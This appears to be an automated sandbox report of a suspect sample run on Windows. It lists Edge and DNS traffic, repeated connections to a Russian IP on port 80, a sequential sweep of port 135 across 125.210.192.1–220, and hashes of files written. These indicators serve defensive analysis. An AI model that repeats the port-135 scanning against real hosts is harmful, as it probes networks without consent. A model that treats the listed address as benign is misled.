US 8.8.8.8:53 edgeassetservice.azureedge.net udp
US 13.107.246.64:443 edgeassetservice.azureedge.net tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.28.11:443 edge.microsoft.com tcp
RU 212.33.237.86:80 tcp
RU 212.33.237.86:80 tcp
N/A 224.0.0.251:5353 udp
RU 212.33.237.86:80 tcp
US 150.171.28.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.28.11:443 edge.microsoft.com tcp
RU 212.33.237.86:80 tcp
RU 212.33.237.86:80 tcp
RU 212.33.237.86:80 tcp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
US 13.107.246.64:443 edge-consumer-static.azureedge.net tcp
RU 212.33.237.86:80 tcp
RU 212.33.237.86:80 tcp
RU 212.33.237.86:80 tcp
US 8.8.8.8:53 static.edge.microsoftapp.net udp
US 8.8.8.8:53 static.edge.microsoftapp.net udp
US 13.107.246.64:443 static.edge.microsoftapp.net tcp
US 150.171.28.11:443 edge.microsoft.com tcp
GB 2.18.27.89:443 www.bing.com udp
US 199.232.214.172:80 msedge.b.tlu.dl.delivery.mp.microsoft.com tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
RU 212.33.237.86:80 tcp
RU 212.33.237.86:80 tcp
RU 212.33.237.86:80 tcp
GB 2.18.27.82:443 www.bing.com udp
CN 125.210.192.1:135 tcp
CN 125.210.192.2:135 tcp
CN 125.210.192.3:135 tcp
CN 125.210.192.4:135 tcp
CN 125.210.192.5:135 tcp
CN 125.210.192.6:135 tcp
CN 125.210.192.7:135 tcp
CN 125.210.192.8:135 tcp
CN 125.210.192.9:135 tcp
CN 125.210.192.10:135 tcp
CN 125.210.192.11:135 tcp
CN 125.210.192.12:135 tcp
CN 125.210.192.13:135 tcp
CN 125.210.192.14:135 tcp
CN 125.210.192.15:135 tcp
CN 125.210.192.16:135 tcp
CN 125.210.192.17:135 tcp
CN 125.210.192.18:135 tcp
CN 125.210.192.19:135 tcp
CN 125.210.192.20:135 tcp
CN 125.210.192.21:135 tcp
CN 125.210.192.22:135 tcp
CN 125.210.192.23:135 tcp
CN 125.210.192.24:135 tcp
CN 125.210.192.25:135 tcp
CN 125.210.192.26:135 tcp
CN 125.210.192.27:135 tcp
CN 125.210.192.28:135 tcp
CN 125.210.192.29:135 tcp
CN 125.210.192.30:135 tcp
CN 125.210.192.31:135 tcp
CN 125.210.192.32:135 tcp
CN 125.210.192.33:135 tcp
CN 125.210.192.34:135 tcp
CN 125.210.192.35:135 tcp
CN 125.210.192.36:135 tcp
CN 125.210.192.37:135 tcp
CN 125.210.192.38:135 tcp
CN 125.210.192.39:135 tcp
CN 125.210.192.40:135 tcp
CN 125.210.192.41:135 tcp
CN 125.210.192.42:135 tcp
CN 125.210.192.43:135 tcp
CN 125.210.192.44:135 tcp
CN 125.210.192.45:135 tcp
CN 125.210.192.46:135 tcp
CN 125.210.192.47:135 tcp
CN 125.210.192.48:135 tcp
CN 125.210.192.49:135 tcp
CN 125.210.192.50:135 tcp
CN 125.210.192.51:135 tcp
CN 125.210.192.52:135 tcp
CN 125.210.192.53:135 tcp
CN 125.210.192.54:135 tcp
CN 125.210.192.55:135 tcp
CN 125.210.192.56:135 tcp
CN 125.210.192.57:135 tcp
CN 125.210.192.58:135 tcp
CN 125.210.192.59:135 tcp
CN 125.210.192.60:135 tcp
CN 125.210.192.61:135 tcp
CN 125.210.192.62:135 tcp
CN 125.210.192.63:135 tcp
CN 125.210.192.64:135 tcp
CN 125.210.192.65:135 tcp
CN 125.210.192.66:135 tcp
CN 125.210.192.67:135 tcp
CN 125.210.192.68:135 tcp
CN 125.210.192.69:135 tcp
CN 125.210.192.70:135 tcp
CN 125.210.192.71:135 tcp
CN 125.210.192.72:135 tcp
CN 125.210.192.73:135 tcp
CN 125.210.192.74:135 tcp
CN 125.210.192.75:135 tcp
CN 125.210.192.76:135 tcp
CN 125.210.192.77:135 tcp
CN 125.210.192.78:135 tcp
CN 125.210.192.79:135 tcp
CN 125.210.192.80:135 tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
CN 125.210.192.81:135 tcp
CN 125.210.192.82:135 tcp
CN 125.210.192.83:135 tcp
CN 125.210.192.84:135 tcp
CN 125.210.192.85:135 tcp
CN 125.210.192.86:135 tcp
CN 125.210.192.87:135 tcp
CN 125.210.192.88:135 tcp
CN 125.210.192.89:135 tcp
CN 125.210.192.90:135 tcp
CN 125.210.192.91:135 tcp
CN 125.210.192.92:135 tcp
CN 125.210.192.93:135 tcp
CN 125.210.192.94:135 tcp
CN 125.210.192.95:135 tcp
CN 125.210.192.96:135 tcp
CN 125.210.192.97:135 tcp
CN 125.210.192.98:135 tcp
CN 125.210.192.99:135 tcp
CN 125.210.192.100:135 tcp
CN 125.210.192.101:135 tcp
CN 125.210.192.102:135 tcp
CN 125.210.192.103:135 tcp
CN 125.210.192.104:135 tcp
CN 125.210.192.105:135 tcp
CN 125.210.192.106:135 tcp
CN 125.210.192.107:135 tcp
CN 125.210.192.108:135 tcp
CN 125.210.192.109:135 tcp
CN 125.210.192.110:135 tcp
CN 125.210.192.111:135 tcp
CN 125.210.192.112:135 tcp
CN 125.210.192.113:135 tcp
CN 125.210.192.114:135 tcp
CN 125.210.192.115:135 tcp
CN 125.210.192.116:135 tcp
CN 125.210.192.117:135 tcp
CN 125.210.192.118:135 tcp
CN 125.210.192.119:135 tcp
CN 125.210.192.120:135 tcp
CN 125.210.192.121:135 tcp
CN 125.210.192.122:135 tcp
CN 125.210.192.123:135 tcp
CN 125.210.192.124:135 tcp
CN 125.210.192.125:135 tcp
CN 125.210.192.126:135 tcp
CN 125.210.192.127:135 tcp
CN 125.210.192.128:135 tcp
CN 125.210.192.129:135 tcp
CN 125.210.192.130:135 tcp
CN 125.210.192.131:135 tcp
CN 125.210.192.132:135 tcp
CN 125.210.192.133:135 tcp
CN 125.210.192.134:135 tcp
CN 125.210.192.135:135 tcp
CN 125.210.192.136:135 tcp
CN 125.210.192.137:135 tcp
CN 125.210.192.138:135 tcp
CN 125.210.192.139:135 tcp
CN 125.210.192.140:135 tcp
CN 125.210.192.141:135 tcp
CN 125.210.192.142:135 tcp
CN 125.210.192.143:135 tcp
CN 125.210.192.144:135 tcp
CN 125.210.192.145:135 tcp
CN 125.210.192.146:135 tcp
CN 125.210.192.147:135 tcp
CN 125.210.192.148:135 tcp
CN 125.210.192.149:135 tcp
CN 125.210.192.150:135 tcp
CN 125.210.192.151:135 tcp
CN 125.210.192.152:135 tcp
CN 125.210.192.153:135 tcp
CN 125.210.192.154:135 tcp
CN 125.210.192.155:135 tcp
CN 125.210.192.156:135 tcp
CN 125.210.192.157:135 tcp
CN 125.210.192.158:135 tcp
CN 125.210.192.159:135 tcp
CN 125.210.192.160:135 tcp
CN 125.210.192.161:135 tcp
CN 125.210.192.162:135 tcp
CN 125.210.192.163:135 tcp
CN 125.210.192.164:135 tcp
CN 125.210.192.165:135 tcp
CN 125.210.192.166:135 tcp
CN 125.210.192.167:135 tcp
CN 125.210.192.168:135 tcp
CN 125.210.192.169:135 tcp
CN 125.210.192.170:135 tcp
CN 125.210.192.171:135 tcp
CN 125.210.192.172:135 tcp
CN 125.210.192.173:135 tcp
CN 125.210.192.174:135 tcp
CN 125.210.192.175:135 tcp
CN 125.210.192.176:135 tcp
CN 125.210.192.177:135 tcp
CN 125.210.192.178:135 tcp
CN 125.210.192.179:135 tcp
CN 125.210.192.180:135 tcp
CN 125.210.192.181:135 tcp
CN 125.210.192.182:135 tcp
CN 125.210.192.183:135 tcp
CN 125.210.192.184:135 tcp
CN 125.210.192.185:135 tcp
CN 125.210.192.186:135 tcp
CN 125.210.192.187:135 tcp
CN 125.210.192.188:135 tcp
CN 125.210.192.189:135 tcp
CN 125.210.192.190:135 tcp
CN 125.210.192.191:135 tcp
CN 125.210.192.192:135 tcp
CN 125.210.192.193:135 tcp
CN 125.210.192.194:135 tcp
CN 125.210.192.195:135 tcp
CN 125.210.192.196:135 tcp
CN 125.210.192.197:135 tcp
CN 125.210.192.198:135 tcp
CN 125.210.192.199:135 tcp
CN 125.210.192.200:135 tcp
CN 125.210.192.201:135 tcp
CN 125.210.192.202:135 tcp
CN 125.210.192.203:135 tcp
CN 125.210.192.204:135 tcp
CN 125.210.192.205:135 tcp
CN 125.210.192.206:135 tcp
CN 125.210.192.207:135 tcp
CN 125.210.192.208:135 tcp
CN 125.210.192.209:135 tcp
CN 125.210.192.210:135 tcp
CN 125.210.192.211:135 tcp
CN 125.210.192.212:135 tcp
CN 125.210.192.213:135 tcp
CN 125.210.192.214:135 tcp
CN 125.210.192.215:135 tcp
CN 125.210.192.216:135 tcp
CN 125.210.192.217:135 tcp
CN 125.210.192.218:135 tcp
CN 125.210.192.219:135 tcp
CN 125.210.192.220:135 tcp

Files

C:\Program Files\7-Zip\7z.exe

MD5 ccdca87540e56b27f2b104bb036662ff
SHA1 36d79e579770a2e4f619b4c09e635c5d48ff56d5
SHA256 630f929545e8277fe3a65970a8ed8c6b8271e2c6446e23334e117fdcecf2c51d
SHA512 636e01d3633c5f1abb0736acaab01e3a7a8f7dfe6c919750fab5cfffb85419432829464963af1a4c2f35458a7ab32d2913efdc8beacfdfd2f605cbf82fcf1a37

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 cdff623fbbb16b2e2df2d00641ce4ea7
SHA1 8cd0b1c131528360fd588f4039c2fd1f6bfd5268
SHA256 5b6f714d384580984a4396f04997e09ee8619d2e2e8780472c911c1368c81479
SHA512 fc1067edbd3afb30765e039fbf436800b434631bd581bc2854db3a6dd263fbc5dbd68846de39d969091902198ded6228a4b012e54737b40a3de35072a42b6681

\??\pipe\crashpad_5292_RTAFTFVKVSANZYYM

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 03b6ceee6d3294b477cb96be0a4821a2
SHA1 17508a8b887dac0d5b2fdf62cce6ee7989564165
SHA256 e373291cec4f23986133c23daa353551f05eda26aac4a4e3686c40f8bfda576e
SHA512 581fbd959baff647df5ac757c03b071653bca94c529807775b30e0f4b88ade1f0dd99850daaea1fa0861ce83d3e9d505a004e6c78d45e923ee39728a2d9efda9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps

MD5 06d55006c2dec078a94558b85ae01aef
SHA1 6a9b33e794b38153f67d433b30ac2a7cf66761e6
SHA256 088bb586f79dd99c5311d14e1560bbe0bb56225a1b4432727d2183341c762bcd
SHA512 ec190652af9c213ccbb823e69c21d769c64e3b9bae27bea97503c352163bf70f93c67cebbf327bfc73bfd632c9a3ae57283b6e4019af04750fe18a2410a68e60

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log

MD5 934d6a13fbfb4ae8743c8261d8aa980a
SHA1 f1bd24c8a5791e92eec58d8947828b63c7bc8679
SHA256 ca374ed95b4bce8b5176da51d2bfb080840a791981d8139641dea874b7e582ac
SHA512 5ce3d1ebcca354fc9f04e1a1d0a9d1c0f4f79c6ad3051b6298ec3cc091d01e8967a53763e1860dda84bdffed3f5fc0565912a7ab4c639d9091a89ba2365db670

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 afd3c5ce0014b19ed9f1ab0ccb610ac4
SHA1 67092caede60e40d67327f50f6ff6849cae0b417
SHA256 db7faba94361b022c851b0fa50e37af106c2402d975fc78553757a2793640d3f
SHA512 c300b1fa73ec915f4ef62d2e3970838d1dc1c63dd72ea9f1d3d7f7e29c61583e205c1710d15237b4f276722e50fa4a7e47545153b4889bc966ebcbe576f085f9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json

MD5 99914b932bd37a50b983c5e7c90ae93b
SHA1 bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA256 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA512 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 2e98928ff585f8761f31526111a7aab8
SHA1 e681ae864d6c3cace37d72df875004b325ecdb9d
SHA256 8ac342a17e4d8bed45b06122f4569e7466d05737b45d2a30e1bb1c085e63517b
SHA512 744ebdd4dc2f8b4c9355a003dfd098224fd43adcbe99302c1f41defd3b9f094716bc32c722ced0bb6f4af90f47af0ceec2cb0cab9e919c9eac0f95361939cfde

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 fd2bf8754a52c30c7c7c1d7859e89800
SHA1 b28e6d8d6bd4b7d3c17bfc82bf675b624b8126cf
SHA256 3a4c360ece19a6456a752c7c15cf99cc22661face959e5869aca823fa66838e1
SHA512 2b5584e744fe42436f45af8f975ec10443bd82bef713522a2d23c922c20d363483798c9b435baa4e9f015d9bca0761f0abaa4d2b276fc035179c2151667f2ad2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

MD5 20d4b8fa017a12a108c87f540836e250
SHA1 1ac617fac131262b6d3ce1f52f5907e31d5f6f00
SHA256 6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d
SHA512 507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 3215d72304efe38cbdcedaf22c170a8a
SHA1 a18bd9209c3d4c7f06710491aac0cf99fed1d04f
SHA256 75f5eeeb175e1c37ea1022bb9426fc33f0c761ac30fb09599493d0ce08f671ee
SHA512 d3b2b688e6e7839784730b0a8badafee99f799a50af383cd9690f3ca1b037de156cb2a2091160242658a4c6bc9509721c098c556a225cf2eb028b98a26136d42

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog

MD5 d5597e746878fede733d9c916085ff07
SHA1 ad6e79cff797c397c644cb90c43e61f0b91a11fd
SHA256 406b468eb7efa1329fd66e656e9fa68f1c4ac1876ea97776fb95df3318a2f646
SHA512 7f374420af238648aac379358db2fec66a9b5cb66b599c130f9fbf326103a30e2497052752618939fd55797bc62418b9a766c0cfb75470e52617d6b390b852e5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 338b5cb7cb7a0f02c6d5ec7e082f053d
SHA1 10853919c968311668dc0b0bad95ce50ff1f5652
SHA256 0404a38573cdcc351d9ba19089cdfe690b824df42f86122d47dcee92992b1a4e
SHA512 5659c6d1bae4f46e440d10f6e13dd6004aed6461befad1ab27791e44105a3dfae40d08259605cff6a05b89cb0dda4cd80fee681944c5ea82c5a603d7b66779b1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 c16c998f4bbdddd1b8d7acafe29c3214
SHA1 4f203a019ee0681240820be3348bdd982d11c29c
SHA256 f4acda152b86656485bf0acfb5d8fd97332ca218154f575507019c3f27889112
SHA512 3b3febf39ecca70eb692e71791bea1a46a094b5173033ee6d6ad158c8fde24e32474b7b304c3cf02d93d098cfcf5410eebfedd333032ba3b710739a3b8f63ed6

C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5292_1151534913\manifest.json

MD5 e0909520982fc48e47a6451443b11741
SHA1 0e46425274933c153ebf5a03f25e693267a8cea2
SHA256 2e9e6138305d702f3c9b89d6e9dc4931b548c69bb86db64e585fa2e37b8ef654
SHA512 3fdf504cb0bf39a807fa15a8ec31a6efd8083888692935ec31d70b4ef6eef89b8527c6a75a46bf7ae3efeeaa507ac3c7cccda5246a2f073ac603a7ffa10d20a8

C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5292_1151534913\LICENSE

MD5 ee002cb9e51bb8dfa89640a406a1090a
SHA1 49ee3ad535947d8821ffdeb67ffc9bc37d1ebbb2
SHA256 3dbd2c90050b652d63656481c3e5871c52261575292db77d4ea63419f187a55b
SHA512 d1fdcc436b8ca8c68d4dc7077f84f803a535bf2ce31d9eb5d0c466b62d6567b2c59974995060403ed757e92245db07e70c6bddbf1c3519fed300cc5b9bf9177c

C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5292_559609418\manifest.json

MD5 8177721150435a9b333475e2b8a6e691
SHA1 8aa8981617e8f3d8967a0a4a2d20315317eba293
SHA256 8a4800ed5f63b9371a024c501ee2b031af94539e32e6753214e6d99c625c018c
SHA512 540c4c52030c6a4e1efcfab5eb59760c696bb3e3f1b8f93c97a6368639a911ba3d395190fc0798d99f3c63e25b6dcf2ded482bbda34d36ddd874dd20c2cfdf74

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.1.24\edge_autofill_global_block_list.json

MD5 adb5f6058f82680a26d6ed02b44e5a21
SHA1 6197ee74e40c742e184357dcb6dfcc7e32818cae
SHA256 7655c9afb5f2ea39b18e302498b34009ca02b72451f82a6d4e7fb4d8d954f050
SHA512 742dd8f6eaf1bd5f24b37e90d7a3dce7bd0a8edf399c2dec25cd92d2bd6e1d663ebab3c68234812f0144061d4f22f0c2c43de890f60e24d93133bbfe23a6d1c5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.1.24\autofill_bypass_cache_forms.json

MD5 9357a694006d8bec3d0f8c9607b76ff8
SHA1 6335ce691999ec10de742cd07d074eb648631259
SHA256 b6c37df977f149c5a444c72ea4469ce666c7975d34c6e2e0d9d8ec416f57dd44
SHA512 87c2d0192f3a78b13a691cda14da507f260d13331b792eb973869bd6dbd0f207faa48f68882be691641b46c06ed12ee8b9728a3b596df67a1f9a4831b4369a44

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.1.24\v1FieldTypes.json

MD5 c1a0d30e5eebef19db1b7e68fc79d2be
SHA1 de4ccb9e7ea5850363d0e7124c01da766425039c
SHA256 f3232a4e83ffc6ee2447aba5a49b8fd7ba13bcfd82fa09ae744c44996f7fcdd1
SHA512 f0eafae0260783ea3e85fe34cc0f145db7f402949a2ae809d37578e49baf767ad408bf2e79e2275d04891cd1977e8a018d6eeb5b95e839083f3722a960ccb57a

C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5292_1772330788\manifest.json

MD5 390af74c5ae643320cad0cef4fa8fee1
SHA1 22ce727f9bcff9a914eb1d58ba8384de6fbda7e1
SHA256 1148c28e540b9b96237b35170a547a13165d6c7c039b8fff9e4b2cd774b92f5a
SHA512 deaeeeffdddea1a9047e97d82e3bb701fb865adcd77ef9e985bb0ec5e4057155e7b83cad4f9f3dd256edf89f19d1075349cea5005dffff8420da4d0646be413a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 601cfc3d7104c6b0cae6658f98404383
SHA1 584fbd6f690483101daa0abbb64bc50b607fee75
SHA256 cc545cce17eaaddc438c9d415b453c52a2094d572c5544378778a1da9e4123dd
SHA512 ed5871a55bbec95c756ceec85f264de01d6149e614aae2ce4e3313c835a446be6b216d51c9860216fa99813f3e54b9f83e198911837626ea6260ba510c9d5a2a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 147f513861d7e6b41a45891b5b30be87
SHA1 102b03bd3f45fb552e1ebc303306e72c0771d769
SHA256 f729c0824133c0a6260494772344a3b79cac90b70b02f8b87749118a39d9129f
SHA512 26d3c674cfc50e85cf59f81ab5ae924c55edcfd136df87912bb9afb7f975bd15d51c34a4c6632c859d8c66141821d049386ee820e804c83c8f3febf670f15ba5